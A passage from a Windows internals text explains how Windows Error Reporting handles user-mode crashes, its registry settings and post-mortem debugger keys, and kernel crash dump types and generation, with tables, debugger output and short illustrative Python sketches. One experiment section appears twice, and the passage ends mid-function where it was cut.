user-mode address space of the process. It then saves all the acquired data in a PSS_SNAPSHOT data
structure representing a snapshot. It finally creates an identical copy of the entire VA space of the crashing
process into another dummy process (cloned process) using the NtCreateProcessEx API (providing a
special combination of flags). From now on, the original process can be terminated, and further opera-
tions needed for the report can be executed on the cloned process.
Note WER does not perform any snapshot creation for protected processes and trustlets.
In these cases, the report is generated by obtaining data from the original faulting process,
which is suspended and resumed only after the report is completed.
Crash report generation
After the snapshot is created, execution control returns to the WER service, which initializes the envi-
ronment for the crash report creation. This is done mainly in two ways:
■ If the crash happened to a normal, unprotected process, the WER service directly invokes the WerpInitiateCrashReporting routine exported from the Windows User Mode Crash Reporting DLL (Faultrep.dll).
■ Crashes belonging to protected processes need another broker process, which is spawned under the SYSTEM account (and not the faulting process credentials). The broker performs some verifications and calls the same routine used for crashes happening in normal processes.
The WerpInitiateCrashReporting routine, when called from the WER service, prepares the environ-
ment for executing the correct Fault Reporting process. It uses APIs exported from the WER library to
initialize the machine store (which, in its default configuration, is located in C:\ProgramData\Microsoft\
Windows\WER) and load all the WER settings from the Windows registry. WER indeed contains many
customizable options that can be configured by the user through the Group Policy editor or by manu-
ally making changes to the registry. At this stage, WER impersonates the user that has started the fault-
ing application and starts the correct Fault Reporting process using the -u main command-line switch,
which indicates to the WerFault (or WerFaultSecure) to process the user crash and create a new report.
Note If the crashing process is a Modern application running under a low-integrity level
or AppContainer token, WER uses the User Manager service to generate a new medium-IL
token representing the user that has launched the faulting application.
Table 10-19 lists the WER registry configuration options, their use, and possible values. These values
are located under the HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting subkey for
computer configuration and in the equivalent path under HKEY_CURRENT_USER for per-user configu-
ration (some values can also be present in the \Software\Policies\Microsoft\Windows\Windows Error
Reporting key).
TABLE 10-19 WER registry settings

Setting | Meaning | Values
ConfigureArchive | Contents of archived data | 1 for parameters, 2 for all data
Consent\DefaultConsent | What kind of data should require consent | 1 for any data, 2 for parameters only, 3 for parameters and safe data, 4 for all data
Consent\DefaultOverrideBehavior | Whether the DefaultConsent overrides WER plug-in consent values | 1 to enable override
Consent\PluginName | Consent value for a specific WER plug-in | Same as DefaultConsent
CorporateWERDirectory | Directory for a corporate WER store | String containing the path
CorporateWERPortNumber | Port to use for a corporate WER store | Port number
CorporateWERServer | Name to use for a corporate WER store | String containing the name
CorporateWERUseAuthentication | Use Windows Integrated Authentication for the corporate WER store | 1 to enable built-in authentication
CorporateWERUseSSL | Use Secure Sockets Layer (SSL) for the corporate WER store | 1 to enable SSL
DebugApplications | List of applications that require the user to choose between Debug and Continue | 1 to require the user to choose
DisableArchive | Whether the archive is enabled | 1 to disable archive
Disabled | Whether WER is disabled | 1 to disable WER
DisableQueue | Determines whether reports are to be queued | 1 to disable queue
DontShowUI | Disables or enables the WER UI | 1 to disable UI
DontSendAdditionalData | Prevents additional crash data from being sent | 1 not to send
ExcludedApplications\AppName | List of applications excluded from WER | String containing the application list
ForceQueue | Whether reports should be sent to the user queue | 1 to send reports to the queue
LocalDumps\DumpFolder | Path at which to store the dump files | String containing the path
LocalDumps\DumpCount | Maximum number of dump files in the path | Count
LocalDumps\DumpType | Type of dump to generate during a crash | 0 for a custom dump, 1 for a minidump, 2 for a full dump
LocalDumps\CustomDumpFlags | For custom dumps, specifies custom options | Values defined in MINIDUMP_TYPE (see Chapter 12 for more information)
LoggingDisabled | Enables or disables logging | 1 to disable logging
MaxArchiveCount | Maximum size of the archive (in files) | Value between 1–5000
MaxQueueCount | Maximum size of the queue | Value between 1–500
QueuePesterInterval | Days between requests to have the user check for solutions | Number of days
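The LocalDumps values in Table 10-19 work together: DumpType selects what kind of dump to write, DumpFolder selects where, and DumpCount bounds how many dump files accumulate there. The following is a hypothetical Python sketch of that combination; the dictionary stands in for registry data, the defaults chosen here are assumptions, and none of this is WER's actual implementation.

```python
# Hypothetical helper illustrating how the LocalDumps\* values in Table 10-19
# combine. The settings dict stands in for registry values; the defaults and
# the oldest-first deletion policy are illustrative assumptions.

DUMP_TYPES = {0: "custom", 1: "minidump", 2: "full"}

def plan_local_dump(settings, existing_dumps):
    """Return (dump_type, folder, dumps_to_delete) for a new crash dump."""
    dump_type = DUMP_TYPES.get(settings.get("DumpType", 1), "minidump")
    folder = settings.get("DumpFolder", r"%LOCALAPPDATA%\CrashDumps")
    max_count = settings.get("DumpCount", 10)
    # Keep at most max_count files: assume existing_dumps is ordered oldest
    # first, and make room for the dump about to be written.
    overflow = len(existing_dumps) + 1 - max_count
    to_delete = existing_dumps[:overflow] if overflow > 0 else []
    return dump_type, folder, to_delete

settings = {"DumpType": 2, "DumpFolder": r"C:\Dumps", "DumpCount": 3}
dumps = ["a.dmp", "b.dmp", "c.dmp"]   # oldest first
kind, folder, stale = plan_local_dump(settings, dumps)
assert (kind, folder, stale) == ("full", r"C:\Dumps", ["a.dmp"])
```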
The Windows Fault Reporting process started with the -u switch begins the report generation:
it maps the shared memory section containing the crash data again, identifies the exception’s
record and descriptor, and obtains the snapshot taken previously. In case the snapshot does not
exist, the WerFault process operates directly on the faulting process, which is suspended. WerFault
first determines the nature of the faulting process (service, native, standard, or shell process). If the
faulting process has asked the system not to report any hard errors (through the SetErrorMode API),
the entire process is aborted, and no report is created. Otherwise, WER checks whether a default
post-mortem debugger is enabled through settings stored in the AeDebug subkey (AeDebugProtected
for protected processes) under the HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ root
registry key. Table 10-20 describes the possible values of both keys.
TABLE 10-20 Valid registry values used for the AeDebug and AeDebugProtected root keys

Value name | Meaning | Data
Debugger | Specify the debugger executable to be launched when an application crashes. | Full path of the debugger executable, with eventual command-line arguments. The -p switch is automatically added by WER, pointing it to the crashing process ID.
ProtectedDebugger | Same as Debugger but for protected processes only. | Full path of the debugger executable. Not valid for the AeDebug key.
Auto | Specify the Autostartup mode. | 1 to enable the launching of the debugger in any case, without any user consent; 0 otherwise.
LaunchNonProtected | Specify whether the debugger should be executed as unprotected. This setting applies only to the AeDebugProtected key. | 1 to launch the debugger as a standard process.
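Table 10-20 notes that WER appends the -p switch, pointing the configured debugger at the crashing process ID. A minimal sketch of how such a launch line could be assembled from those values follows; the -p handling mirrors the table's description, while the dictionary input and everything else is illustrative, not WER's real code.

```python
# Sketch of assembling a post-mortem debugger launch line from AeDebug-style
# values (Table 10-20). Only the -p behavior follows the table; the rest is
# an illustrative assumption.

def build_debugger_cmdline(aedebug, pid):
    debugger = aedebug.get("Debugger")
    if not debugger:
        return None                   # no post-mortem debugger configured
    auto = aedebug.get("Auto", "0") == "1"
    # Per the table, WER points the debugger at the crashing process ID.
    cmdline = f"{debugger} -p {pid}"
    return cmdline, auto

cmd, auto = build_debugger_cmdline(
    {"Debugger": r'"C:\Debuggers\windbg.exe"', "Auto": "1"}, pid=4242)
assert cmd == r'"C:\Debuggers\windbg.exe" -p 4242'
assert auto is True
```

When Auto is not set to 1, the text that follows explains that WER asks for consent (or applies the DebugApplications policy) before launching the debugger.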
If the debugger start type is set to Auto, WER starts it and waits for a debugger event to be sig-
naled before continuing the report creation. The report generation is started through the internal
GenerateCrashReport routine implemented in the User Mode Crash Reporting DLL (Faultrep.dll).
The latter configures all the WER plug-ins and initializes the report using the WerReportCreate
API, exported from WER.dll. (Note that at this stage, the report is only located in memory.) The
GenerateCrashReport routine calculates the report ID and a signature and adds further diagnostics
data to the report, like the process times and startup parameters or application-defined data. It then
checks the WER configuration to determine which kind of memory dump to create (by default, a
minidump is acquired). It then calls the exported WerReportAddDump API to initialize the
dump acquisition for the faulting process (the dump will be added to the final report). Note that if a snapshot
has been previously acquired, it is used for acquiring the dump.
The WerReportSubmit API, exported from WER.dll, is the central routine that generates the dump
of the faulting process, creates all the files included in the report, shows the UI (unless disabled
through the DontShowUI registry value), and sends the report to the Online Crash server. The report usually
includes the following:
■ A minidump file of the crashing process (usually named memory.hdmp)
■ A human-readable text report, which includes exception information, the calculated signature of the crash, OS information, a list of all the files associated with the report, and a list of all the modules loaded in the crashing process (this file is usually named report.wer)
■ A CSV (comma-separated values) file containing a list of all the active processes at the time of the crash and basic information (like the number of threads, the private working set size, hard fault count, and so on)
■ A text file containing the global memory status information
■ A text file containing application compatibility information
The Fault Reporting process communicates through ALPC to the WER service and sends commands
to allow the service to generate most of the information present in the report. After all the files have
been generated, if configured appropriately, the Windows Fault Reporting process presents a dialog
box (as shown in Figure 10-39) to the user, notifying that a critical error has occurred in the target
process. (This feature is disabled by default in Windows 10.)
FIGURE 10-39 The Windows Error Reporting dialog box.
In environments where systems are not connected to the Internet or where the administrator wants
to control which error reports are submitted to Microsoft, the destination for the error report can
be configured to be an internal file server. The System Center Desktop Error Monitoring (part of the
Microsoft Desktop Optimization Pack) understands the directory structure created by Windows Error
Reporting and provides the administrator with the option to take selective error reports and submit
them to Microsoft.
As previously discussed, the WER service uses an ALPC port for communicating with crashed
processes. This mechanism uses a systemwide error port that the WER service registers through
NtSetInformationProcess (which uses DbgkRegisterErrorPort). As a result, all Windows processes have
an error port that is actually an ALPC port object registered by the WER service. The kernel and the
unhandled exception filter in Ntdll use this port to send a message to the WER service, which then
analyzes the crashing process. This means that even in severe cases of thread state damage, WER is still
able to receive notifications and launch WerFault.exe to log the detailed information of the critical er-
ror in a Windows Event log (or to display a user interface to the user) instead of having to do this work
within the crashing thread itself. This solves all the problems of silent process death: Users are notified,
debugging can occur, and service administrators can see the crash event.
EXPERIMENT: Enabling the WER user interface
Starting with the initial release of Windows 10, the user interface displayed by WER when an ap-
plication crashes has been disabled by default. This is primarily because of the introduction of the
Restart Manager (part of the Application Recovery and Restart technology). The latter allows ap-
plications to register a restart or recovery callback invoked when an application crashes, hangs,
or just needs to be restarted for servicing an update. As a result, classic applications that do
not register any recovery callback when they encounter an unhandled exception just terminate
without displaying any message to the user (but correctly logging the error in the system log).
As discussed in this section, WER supports a user interface, which can be enabled by just adding a
value in one of the WER keys used for storing settings. For this experiment, you will re-enable the
WER UI using the global system key.
From the book’s downloadable resources, copy the BuggedApp executable and run it. After
pressing a key, the application generates a critical unhandled exception that WER intercepts
and reports. In default configurations, no error message is displayed. The process is terminated,
an error event is stored in the system log, and the report is generated and sent without any
user intervention. Open the Registry Editor (by typing regedit in the Cortana search box) and
navigate to the HKLM\SOFTWARE\Microsoft\Windows\Windows Error Reporting registry key.
If the DontShowUI value does not exist, create it by right-clicking the root key and selecting New,
DWORD (32 bit) Value and assign 0 to it.
If you restart the bugged application and press a key, WER displays a user interface similar
to the one shown in Figure 10-39 before terminating the crashing application. You can repeat
the experiment by adding a debugger to the AeDebug key. Running Windbg with the -I switch
performs the registration automatically, as discussed in the “Witnessing a COM-hosted task”
experiment earlier in this chapter.
Kernel-mode (system) crashes
Before discussing how WER is involved when a kernel crashes, we need to introduce how the ker-
nel records crash information. By default, all Windows systems are configured to attempt to record
information about the state of the system before the Blue Screen of Death (BSOD) is displayed, and
the system is restarted. You can see these settings by opening the System Properties tool in Control
Panel (under System and Security, System, Advanced System Settings), clicking the Advanced tab,
and then clicking the Settings button under Startup and Recovery. The default settings for a Windows
system are shown in Figure 10-40.
FIGURE 10-40 Crash dump settings.
Crash dump files
Different levels of information can be recorded on a system crash:
■ Active memory dump: An active memory dump contains all physical memory accessible and in use by Windows at the time of the crash. This type of dump is a subset of the complete memory dump; it just filters out pages that are not relevant for troubleshooting problems on the host machine. This dump type includes memory allocated to user-mode applications and active pages mapped into the kernel or user space, as well as selected pagefile-backed Transition, Standby, and Modified pages, such as the memory allocated with VirtualAlloc or page-file-backed sections. Active dumps do not include pages on the free and zeroed lists, the file cache, guest VM pages, and various other types of memory that are not useful during debugging.

■ Complete memory dump: A complete memory dump is the largest kernel-mode dump file that contains all the physical pages accessible by Windows. This type of dump is not fully supported on all platforms (the active memory dump superseded it). Windows requires that a page file be at least the size of physical memory plus 1 MB for the header. Device drivers can add up to 256 MB for secondary crash dump data, so to be safe, it’s recommended that you increase the size of the page file by an additional 256 MB.

■ Kernel memory dump: A kernel memory dump includes only the kernel-mode pages allocated by the operating system, the HAL, and device drivers that are present in physical memory at the time of the crash. This type of dump does not contain pages belonging to user processes. Because only kernel-mode code can directly cause Windows to crash, however, it’s unlikely that user process pages are necessary to debug a crash. In addition, all data structures relevant for crash dump analysis (including the list of running processes, the kernel-mode stack of the current thread, and the list of loaded drivers) are stored in nonpaged memory that is saved in a kernel memory dump. There is no way to predict the size of a kernel memory dump because its size depends on the amount of kernel-mode memory allocated by the operating system and drivers present on the machine.

■ Automatic memory dump: This is the default setting for both Windows client and server systems. An automatic memory dump is similar to a kernel memory dump, but it also saves some metadata of the active user-mode process (at the time of the crash). Furthermore, this dump type allows better management of the system paging file’s size. Windows can set the size of the paging file to less than the size of RAM but large enough to ensure that a kernel memory dump can be captured most of the time.

■ Small memory dump: A small memory dump, which is typically between 128 KB and 1 MB in size and is also called a minidump or triage dump, contains the stop code and parameters, the list of loaded device drivers, the data structures that describe the current process and thread (called the EPROCESS and ETHREAD, described in Chapter 3 of Part 1), the kernel stack for the thread that caused the crash, and additional memory considered potentially relevant by crash dump heuristics, such as the pages referenced by processor registers that contain memory addresses and secondary dump data added by drivers.
Note Device drivers can register a secondary dump data callback routine by calling
KeRegisterBugCheckReasonCallback. The kernel invokes these callbacks after a crash and a
callback routine can add additional data to a crash dump file, such as device hardware mem-
ory or device information for easier debugging. Up to 256 MB can be added systemwide by
all drivers, depending on the space required to store the dump and the size of the file into
which the dump is written, and each callback can add at most one-eighth of the available
additional space. Once the additional space is consumed, drivers subsequently called are
not offered the chance to add data.
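The budget described in the note — 256 MB systemwide, each callback limited to a fraction of whatever space remains when it runs — can be sketched arithmetically. The exact kernel accounting is not spelled out here; this Python model only illustrates the stated limits, taking "one-eighth of the available additional space" to mean one-eighth of what is left at the time each callback runs.

```python
# Arithmetic sketch of the secondary-dump-data budget from the note above:
# a 256 MB systemwide pool, each callback capped at one-eighth of the space
# still available when it runs. Illustrative model, not the kernel's code.

MB = 1024 * 1024
POOL = 256 * MB

def grant(requests):
    available = POOL
    grants = []
    for want in requests:
        cap = available // 8          # at most 1/8 of what is left
        got = min(want, cap)
        grants.append(got)
        available -= got
    return grants

g = grant([100 * MB, 100 * MB, 100 * MB])
assert g[0] == 32 * MB                # 256 MB / 8
assert g[1] == 28 * MB                # (256 - 32) MB / 8
assert g[2] == 24 * MB + 512 * 1024   # (224 - 28) MB / 8 = 24.5 MB
```

Under this model the pool is never exhausted by any single driver, but each successive callback sees a smaller cap, which matches the note's point that latecomers may be offered little or nothing.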
The debugger indicates that it has limited information available to it when it loads a minidump, and
basic commands like !process, which lists active processes, don’t have the data they need. A kernel
memory dump includes more information, but switching to a different process’s address space map-
pings won’t work because required data isn’t in the dump file. While a complete memory dump is a
superset of the other options, it has the drawback that its size tracks the amount of physical memory on
a system and can therefore become unwieldy. Even though user-mode code and data usually are not
used during the analysis of most crashes, the active memory dump overcame the limitation by storing
in the dump only the memory that is actually used (excluding physical pages in the free and zeroed
list). As a result, it is possible to switch address space in an active memory dump.
An advantage of a minidump is its small size, which makes it convenient for exchange via email,
for example. In addition, each crash generates a file in the directory %SystemRoot%\Minidump with
a unique file name consisting of the date, the number of milliseconds that have elapsed since the
system was started, and a sequence number (for example, 040712-24835-01.dmp). If there's a conflict,
the system attempts to create additional unique file names by calling the Windows GetTickCount
function to return an updated system tick count, and it also increments the sequence number. By
default, Windows saves the last 50 minidumps. The number of minidumps saved is configurable
by modifying the MinidumpsCount value under the HKLM\SYSTEM\CurrentControlSet\Control\
CrashControl registry key.
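The naming scheme just described (date, milliseconds since boot, sequence number, with the tick count refreshed on a collision) can be sketched as follows. This is an illustrative Python model: the helper names are invented, and file-system lookups are faked with a set.

```python
# Sketch of the minidump naming scheme described above: MMDDYY, milliseconds
# since boot, and a two-digit sequence number, retrying with a fresh tick
# count and incremented sequence number on a name collision. Illustrative
# only; helper names are invented.

from datetime import date

def minidump_name(day, tick_ms, seq):
    return f"{day:%m%d%y}-{tick_ms}-{seq:02d}.dmp"

def unique_name(existing, day, get_tick_count, seq=1):
    name = minidump_name(day, get_tick_count(), seq)
    while name in existing:           # conflict: new tick count, next sequence
        seq += 1
        name = minidump_name(day, get_tick_count(), seq)
    return name

ticks = iter([24835, 24836])          # fake GetTickCount readings
existing = {"040712-24835-01.dmp"}
name = unique_name(existing, date(2012, 4, 7), lambda: next(ticks))
assert name == "040712-24836-02.dmp"
```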
A significant disadvantage is that the limited amount of data stored in the dump can hamper effective
analysis. You can also get the advantages of minidumps even when you configure a system to generate
kernel, complete, active, or automatic crash dumps by opening the larger crash with WinDbg and using
the .dump /m command to extract a minidump. Note that a minidump is automatically created even if
the system is set for full or kernel dumps.
Note You can use the .dump command from within LiveKd to generate a memory image
of a live system that you can analyze offline without stopping the system. This approach is
useful when a system is exhibiting a problem but is still delivering services, and you want to
troubleshoot the problem without interrupting service. To prevent creating crash images
that aren’t necessarily fully consistent because the contents of different regions of memory
reflect different points in time, LiveKd supports the –m flag. The mirror dump option pro-
duces a consistent snapshot of kernel-mode memory by leveraging the memory manager’s
memory mirroring APIs, which give a point-in-time view of the system.
The kernel memory dump option offers a practical middle ground. Because it contains all kernel-
mode-owned physical memory, it has the same level of analysis-related data as a complete memory
dump, but it omits the usually irrelevant user-mode data and code, and therefore can be significantly
smaller. As an example, on a system running a 64-bit version of Windows with 4 GB of RAM, a kernel
memory dump was 294 MB in size.
When you configure kernel memory dumps, the system checks whether the paging file is large
enough, as described earlier. There isn’t a reliable way to predict the size of a kernel memory dump.
The reason you can’t predict the size of a kernel memory dump is that its size depends on the amount
of kernel-mode memory in use by the operating system and drivers present on the machine at the time
of the crash. Therefore, it is possible that at the time of the crash, the paging file is too small to hold a
kernel dump, in which case the system will switch to generating a minidump. If you want to see the size
of a kernel dump on your system, force a manual crash either by configuring the registry option to al-
low you to initiate a manual system crash from the console (documented at https://docs.microsoft.com/
en-us/windows-hardware/drivers/debugger/forcing-a-system-crash-from-the-keyboard) or by using
the Notmyfault tool (https://docs.microsoft.com/en-us/sysinternals/downloads/notmyfault).
The automatic memory dump overcomes this limitation. The system is indeed able
to create a paging file large enough to ensure that a kernel memory dump can be captured most of
the time. If the computer crashes and the paging file is not large enough to capture a kernel memory
dump, Windows increases the size of the paging file to at least the size of the physical RAM installed.
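The adjustment just described boils down to a simple rule, sketched below. The real sizing policy has more inputs than this; the Python model mirrors only the rule stated in the text: after a failed capture, grow the paging file to at least the installed RAM size.

```python
# Sketch of the automatic-dump paging-file adjustment described above.
# Only the stated rule is modeled: if a kernel dump could not be captured
# because the paging file was too small, grow it to at least RAM size.

def adjust_pagefile(pagefile_bytes, ram_bytes, last_dump_failed):
    if last_dump_failed and pagefile_bytes < ram_bytes:
        return ram_bytes
    return pagefile_bytes

GB = 1024 ** 3
assert adjust_pagefile(2 * GB, 8 * GB, last_dump_failed=True) == 8 * GB
assert adjust_pagefile(2 * GB, 8 * GB, last_dump_failed=False) == 2 * GB
```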
To limit the amount of disk space that is taken up by crash dumps, Windows needs to determine
whether it should maintain a copy of the last kernel or complete dump. After reporting the kernel
fault (described later), Windows uses the following algorithm to decide whether it should keep the
Memory.dmp file. If the system is a server, Windows always stores the dump file. On a Windows client
system, only domain-joined machines will always store a crash dump by default. For a non-domain-
joined machine, Windows maintains a copy of the crash dump only if there is more than 25 GB of
free disk space on the destination volume (4 GB on ARM64, configurable via the HKLM\SYSTEM\
CurrentControlSet\Control\CrashControl\PersistDumpDiskSpaceLimit registry value)—that is, the
volume where the system is configured to write the Memory.dmp file. If the system, due to disk space
constraints, is unable to keep a copy of the crash dump file, an event is written to the System event
log indicating that the dump file was deleted, as shown in Figure 10-41. This behavior can be overrid-
den by creating the DWORD registry value HKLM\SYSTEM\CurrentControlSet\Control\CrashControl\
AlwaysKeepMemoryDump and setting it to 1, in which case Windows always keeps a crash dump,
regardless of the amount of free disk space.
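The retention decision above can be summarized as a short predicate. The thresholds follow the text (25 GB, or 4 GB on ARM64, overridable by PersistDumpDiskSpaceLimit, which this sketch ignores); the function and parameter names are invented for illustration, and the real check lives in the crash-reporting code.

```python
# Model of the Memory.dmp retention algorithm described above: servers
# always keep the dump, domain-joined clients keep it by default, and other
# clients keep it only with enough free space, unless AlwaysKeepMemoryDump
# is set. Illustrative sketch; names are invented.

GB = 1024 ** 3

def keep_memory_dmp(is_server, domain_joined, free_bytes,
                    arm64=False, always_keep=False):
    if always_keep or is_server or domain_joined:
        return True
    threshold = 4 * GB if arm64 else 25 * GB
    return free_bytes > threshold

assert keep_memory_dmp(True, False, 0)                      # server
assert keep_memory_dmp(False, True, 0)                      # domain-joined
assert not keep_memory_dmp(False, False, 10 * GB)           # too little space
assert keep_memory_dmp(False, False, 30 * GB)               # enough space
assert keep_memory_dmp(False, False, 5 * GB, arm64=True)    # ARM64 threshold
assert keep_memory_dmp(False, False, 0, always_keep=True)   # registry override
```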
FIGURE 10-41 Dump file deletion event log entry.
EXPERIMENT: Viewing dump file information
Each crash dump file contains a dump header that describes the stop code and its parameters,
the type of system the crash occurred on (including version information), and a list of pointers
to important kernel-mode structures required during analysis. The dump header also contains
the type of crash dump that was written and any information specific to that type of dump. The
.dumpdebug debugger command can be used to display the dump header of a crash dump file.
For example, the following output is from a crash of a system that was configured for an auto-
matic dump:
0: kd> .dumpdebug
----- 64 bit Kernel Bitmap Dump Analysis - Kernel address space is available,
User address space may not be available.
DUMP_HEADER64:
MajorVersion 0000000f
MinorVersion 000047ba
KdSecondaryVersion 00000002
DirectoryTableBase 00000000`006d4000
PfnDataBase ffffe980`00000000
PsLoadedModuleList fffff800`5df00170
PsActiveProcessHead fffff800`5def0b60
MachineImageType 00008664
NumberProcessors 00000003
BugCheckCode        000000e2
BugCheckParameter1  00000000`00000000
BugCheckParameter2  00000000`00000000
BugCheckParameter3  00000000`00000000
BugCheckParameter4  00000000`00000000
KdDebuggerDataBlock fffff800`5dede5e0
SecondaryDataState  00000000
ProductType         00000001
SuiteMask           00000110
Attributes          00000000
BITMAP_DUMP:
DumpOptions         00000000
HeaderSize          16000
BitmapSize          9ba00
Pages               25dee
KiProcessorBlock at fffff800`5e02dac0
3 KiProcessorBlock entries:
fffff800`5c32f180 ffff8701`9f703180 ffff8701`9f3a0180
The .enumtag command displays all secondary dump data stored within a crash dump (as
shown below). For each callback of secondary data, the tag, the length of the data, and the data
itself (in byte and ASCII format) are displayed. Developers can use Debugger Extension APIs to
create custom debugger extensions to also read secondary dump data. (See the “Debugging
Tools for Windows” help file for more information.)
EXPERIMENT: Viewing dump file information
Each crash dump file contains a dump header that describes the stop code and its parameters,
the type of system the crash occurred on (including version information), and a list of pointers
to important kernel-mode structures required during analysis. The dump header also contains
the type of crash dump that was written and any information specific to that type of dump. The
.dumpdebug debugger command can be used to display the dump header of a crash dump file.
For example, the following output is from a crash of a system that was configured for an auto-
matic dump:
0: kd> .dumpdebug
----- 64 bit Kernel Bitmap Dump Analysis - Kernel address space is available,
User address space may not be available.
DUMP_HEADER64:
MajorVersion 0000000f
MinorVersion 000047ba
KdSecondaryVersion 00000002
DirectoryTableBase 00000000`006d4000
PfnDataBase ffffe980`00000000
PsLoadedModuleList fffff800`5df00170
PsActiveProcessHead fffff800`5def0b60
MachineImageType 00008664
NumberProcessors 00000003
BugCheckCode        000000e2
BugCheckParameter1  00000000`00000000
BugCheckParameter2  00000000`00000000
BugCheckParameter3  00000000`00000000
BugCheckParameter4  00000000`00000000
KdDebuggerDataBlock fffff800`5dede5e0
SecondaryDataState  00000000
ProductType         00000001
SuiteMask           00000110
Attributes          00000000
BITMAP_DUMP:
DumpOptions         00000000
HeaderSize          16000
BitmapSize          9ba00
Pages               25dee
KiProcessorBlock at fffff800`5e02dac0
3 KiProcessorBlock entries:
fffff800`5c32f180 ffff8701`9f703180 ffff8701`9f3a0180
The .enumtag command displays all secondary dump data stored within a crash dump (as
shown below). For each callback of secondary data, the tag, the length of the data, and the data
itself (in byte and ASCII format) are displayed. Developers can use Debugger Extension APIs to
create custom debugger extensions to also read secondary dump data. (See the “Debugging
Tools for Windows” help file for more information.)
548
CHAPTER 10 Management, diagnostics, and tracing
{E83B40D2-B0A0-4842-ABEA71C9E3463DD1} - 0x100 bytes
46 41 43 50 14 01 00 00 06 98 56 52 54 55 41 4C FACP......VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54 MICROSFT....MSFT
53 52 41 54 A0 01 00 00 02 C6 56 52 54 55 41 4C SRAT......VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54 MICROSFT....MSFT
57 41 45 54 28 00 00 00 01 22 56 52 54 55 41 4C WAET(...."VRTUAL
4D 49 43 52 4F 53 46 54 01 00 00 00 4D 53 46 54 MICROSFT....MSFT
41 50 49 43 60 00 00 00 04 F7 56 52 54 55 41 4C APIC`.....VRTUAL
...
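The secondary dump data shown by .enumtag is conceptually a sequence of tagged blobs: a GUID tag, a length, and the raw bytes. The exact on-disk layout is internal to the dump format; the following Python sketch illustrates the general tag-length-value idea with a hypothetical packing (16-byte GUID, 4-byte little-endian length, then the data), not the real structure.

```python
import struct
import uuid

def parse_tagged_blobs(buf):
    """Parse a hypothetical tag-length-value stream: a 16-byte GUID tag,
    a 4-byte little-endian length, then the raw data bytes."""
    records = []
    off = 0
    while off + 20 <= len(buf):
        tag = uuid.UUID(bytes_le=buf[off:off + 16])
        (length,) = struct.unpack_from("<I", buf, off + 16)
        data = buf[off + 20:off + 20 + length]
        records.append((str(tag).upper(), data))
        off += 20 + length
    return records

# Build one record resembling the .enumtag output above.
tag = uuid.UUID("{E83B40D2-B0A0-4842-ABEA-71C9E3463DD1}")
payload = b"FACP" + b"\x00" * 12
blob = tag.bytes_le + struct.pack("<I", len(payload)) + payload
for t, d in parse_tagged_blobs(blob):
    print(t, len(d), d[:4])
```

A real debugger extension would instead obtain each record through the Debugger Extension APIs rather than parsing the file directly.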
Crash dump generation
Phase 1 of the system boot process allows the I/O manager to check the configured crash dump op-
tions by reading the HKLM\SYSTEM\CurrentControlSet\Control\CrashControl registry key. If a dump
is configured, the I/O manager loads the crash dump driver (Crashdmp.sys) and calls its entry point.
The entry point transfers back to the I/O manager a table of control functions, which are used by the
I/O manager for interacting with the crash dump driver. The I/O manager also initializes the secure
encryption needed by the Secure Kernel to store the encrypted pages in the dump. One of the control
functions in the table initializes the global crash dump system. It gets the physical sectors (file extent)
where the page file is stored and the volume device object associated with it.
The global crash dump initialization function obtains the miniport driver that manages the physical
disk in which the page file is stored. It then uses the MmLoadSystemImageEx routine to make a copy
of the crash dump driver and the disk miniport driver, giving them their original names prefixed by the
dump_ string. Note that this also implies creating a copy of all the drivers imported by the miniport
driver, as shown in Figure 10-42.
FIGURE 10-42 Kernel modules copied for use to generate and write a crash dump file.
The system also queries the DumpFilters value for any filter drivers that are required for writing to
the volume, an example being Dumpfve.sys, the BitLocker Drive Encryption Crashdump Filter driver. It
also collects information related to the components involved with writing a crash dump—including the
name of the disk miniport driver, the I/O manager structures that are necessary to write the dump, and
the map of where the paging file is on disk—and saves two copies of the data in dump-context struc-
tures. The system is ready to generate and write a dump using a safe, noncorrupted path.
Indeed, when the system crashes, the crash dump driver (%SystemRoot%\System32\Drivers\
Crashdmp.sys) verifies the integrity of the two dump-context structures obtained at boot by performing
a memory comparison. If the two copies don't match, it does not write a crash dump because doing so
would likely fail or corrupt the disk. Upon a successful match, Crashdmp.sys, with support
from the copied disk miniport driver and any required filter drivers, writes the dump information
directly to the sectors on disk occupied by the paging file, bypassing the file system driver and storage
driver stack (which might be corrupted or even have caused the crash).
Note Because the page file is opened early during system startup for crash dump use,
most crashes that are caused by bugs in system-start driver initialization result in a dump
file. Crashes in early Windows boot components such as the HAL or the initialization of boot
drivers occur too early for the system to have a page file, so using another computer to
debug the startup process is the only way to perform crash analysis in those cases.
During the boot process, the Session Manager (Smss.exe) checks the registry value HKLM\SYSTEM\
CurrentControlSet\Control\Session Manager\Memory Management\ExistingPageFiles for a list of ex-
isting page files from the previous boot. (See Chapter 5 of Part 1 for more information on page files.) It
then cycles through the list, calling the function SmpCheckForCrashDump on each file present, looking
to see whether it contains crash dump data. It checks by searching the header at the top of each paging
file for the signature PAGEDUMP or PAGEDU64 on 32-bit or 64-bit systems, respectively. (A match indi-
cates that the paging file contains crash dump information.) If crash dump data is present, the Session
Manager then reads a set of crash parameters from the HKLM\SYSTEM\CurrentControlSet\Control\
CrashControl registry key, including the DumpFile value that contains the name of the target dump file
(typically %SystemRoot%\Memory.dmp, unless configured otherwise).
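The signature check performed by SmpCheckForCrashDump can be sketched as follows. This is a simplified illustration: only the signature comparison is shown, and real dump-header parsing involves many more fields.

```python
def paging_file_contains_dump(header):
    """Return '32-bit', '64-bit', or None depending on whether the
    paging-file header starts with the PAGEDUMP or PAGEDU64 signature,
    which indicates that the file contains crash dump data."""
    if header.startswith(b"PAGEDUMP"):
        return "32-bit"
    if header.startswith(b"PAGEDU64"):
        return "64-bit"
    return None

print(paging_file_contains_dump(b"PAGEDU64" + b"\x00" * 120))
```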
Smss.exe then checks whether the target dump file is on a different volume than the paging file.
If so, it checks whether the target volume has enough free disk space (the size required for the crash
dump is stored in the dump header of the page file) before truncating the paging file to the size of the
crash data and renaming it to a temporary dump file name. (A new page file will be created later when
the Session Manager calls the NtCreatePagingFile function.) The temporary dump file name takes the
format DUMPxxxx.tmp, where xxxx is the current low-word value of the system's tick count. (The system
attempts 100 times to find a nonconflicting value.) After renaming the page file, the system removes
both the hidden and system attributes from the file and sets the appropriate security descriptors to
secure the crash dump.
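The temporary-name search can be sketched like this. The increment-on-collision strategy is an assumption of this sketch; the text only says the system makes up to 100 attempts to find a nonconflicting value.

```python
def make_temp_dump_name(tick_count, existing_names, attempts=100):
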